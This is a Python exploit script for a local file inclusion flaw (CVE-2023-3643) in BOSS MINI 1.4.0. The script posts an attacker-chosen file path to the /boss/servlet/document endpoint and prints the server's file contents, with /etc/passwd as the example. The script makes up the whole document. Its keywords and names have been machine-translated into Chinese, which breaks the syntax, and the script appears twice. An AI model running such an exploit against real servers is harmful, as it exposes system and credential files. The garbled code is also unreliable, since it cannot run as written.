#利用标题: BOSS MINI 1.4.0-本地文件包含
#日期: 07/12/2023
#漏洞作者: [nltt0](https://github.com/nltt-br))
#CVE: CVE-2023-3643
'''
______ _____
/__ \ | |/___ |
|/\/__ _ | | __ _ __________________ \` - 。
| |/` | |/` | '_ \/` |/ \/__ | ` - 。 \ \
| \ __/\(_ | | | | | | | | |(_ | |(_ | |()\ _ \/\ __//////
\ __/\ __,_ | _ | \ __,_ | _ | | _ | \ __,| \ _/| _/\ _//
__/|
| ___/
'''
从请求导入
来自urllib.parse导入报价
来自ArgParse Import grognmparser
TRY:
parser=grightparser(description='本地文件包含[boss mini]')
parser.add_argument(' - 域',必需=true,help='应用域')
parser.add_argument(' - file',必需=true,help='local file')
args=parser.parse_args()
主机=args.domain
file=args.file
url='{} /boss/servlet/document'.format(host)
file2=quote(file,safe='')
标题={
'host':主持人,
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:109.0)gecko/20100101 Firefox/118.0',
'content-type':'应用程序/x-www-form-urlencoded',
'Accept':'text/html,application/xhtml+xml,application/xml; q=0.9,image/avif,image/webp,image/apng,/; q=0.8,application/application/nigned-exchange',
'参考器:'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)
}
数据={
'path': file2
}
TRY:
req=post(url,标头=标题,data=data,verify=false)
如果req.status_code==200:
打印(req.text)
除异常外,E:
print({}'中的错误格式(e))
除异常外,E:
print({}'中的错误格式(e))
#日期: 07/12/2023
#漏洞作者: [nltt0](https://github.com/nltt-br))
#CVE: CVE-2023-3643
'''
______ _____
/__ \ | |/___ |
|/\/__ _ | | __ _ __________________ \` - 。
| |/` | |/` | '_ \/` |/ \/__ | ` - 。 \ \
| \ __/\(_ | | | | | | | | |(_ | |(_ | |()\ _ \/\ __//////
\ __/\ __,_ | _ | \ __,_ | _ | | _ | \ __,| \ _/| _/\ _//
__/|
| ___/
'''
从请求导入
来自urllib.parse导入报价
来自ArgParse Import grognmparser
TRY:
parser=grightparser(description='本地文件包含[boss mini]')
parser.add_argument(' - 域',必需=true,help='应用域')
parser.add_argument(' - file',必需=true,help='local file')
args=parser.parse_args()
主机=args.domain
file=args.file
url='{} /boss/servlet/document'.format(host)
file2=quote(file,safe='')
标题={
'host':主持人,
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:109.0)gecko/20100101 Firefox/118.0',
'content-type':'应用程序/x-www-form-urlencoded',
'Accept':'text/html,application/xhtml+xml,application/xml; q=0.9,image/avif,image/webp,image/apng,/; q=0.8,application/application/nigned-exchange',
'参考器:'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)
}
数据={
'path': file2
}
TRY:
req=post(url,标头=标题,data=data,verify=false)
如果req.status_code==200:
打印(req.text)
除异常外,E:
print({}'中的错误格式(e))
除异常外,E:
print({}'中的错误格式(e))
